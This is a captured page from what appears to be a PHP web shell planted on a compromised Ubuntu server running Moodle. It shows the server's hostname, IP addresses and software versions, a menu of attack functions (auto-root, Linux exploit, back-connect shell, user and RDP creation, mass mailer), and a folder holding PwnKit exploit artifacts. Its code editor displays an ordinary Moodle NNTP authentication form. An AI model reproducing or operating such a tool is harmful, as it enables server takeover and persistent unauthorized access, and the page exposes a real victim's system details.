Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
auth /
nntp /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
auth.php
3.66
KB
-rwxrwxrwx
config.html
1.91
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
version.php
1.15
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.html
<?php // set to defaults if undefined if (!isset($config->host)) { $config->host = "127.0.0.1"; } if (!isset($config->port)) { $config->port = "119"; } if (!isset($config->changepasswordurl)) { $config->changepasswordurl = ''; } ?> <table cellspacing="0" cellpadding="5" border="0"> <tr valign="top" class="required"> <td align="right"><label for="host"><?php print_string('auth_nntphost_key', 'auth_nntp') ?>: </label></td> <td> <input name="host" id="host" type="text" size="30" value="<?php echo $config->host ?>" /> <?php if (isset($err["host"])) { echo $OUTPUT->error_text($err["host"]); } ?> </td> <td> <?php print_string("auth_nntphost", "auth_nntp"); print_string("auth_multiplehosts", "auth"); ?> </td> </tr> <tr valign="top" class="required"> <td align="right"><label for="port"><?php print_string('auth_nntpport_key', 'auth_nntp') ?>: </label></td> <td> <input name="port" id="port" type="text" size="6" value="<?php echo $config->port ?>" /> <?php if (isset($err["port"])) { echo $OUTPUT->error_text($err["port"]); } ?> </td> <td><?php print_string("auth_nntpport", "auth_nntp") ?></td> </tr> <tr valign="top"> <td align="right"><label for="changepasswordurl"><?php print_string('auth_nntpchangepasswordurl_key', 'auth_nntp') ?>: </label></td> <td> <input name="changepasswordurl" id="changepasswordurl" type="text" value="<?php echo $config->changepasswordurl ?>" /> <?php if (isset($err['changepasswordurl'])) { echo $OUTPUT->error_text($err['changepasswordurl']); } ?> </td> <td><?php print_string('changepasswordhelp', 'auth') ?></td> </tr> <?php print_auth_lock_options($this->authtype, $user_fields, get_string('auth_fieldlocks_help', 'auth'), false, false); ?> </table>
Close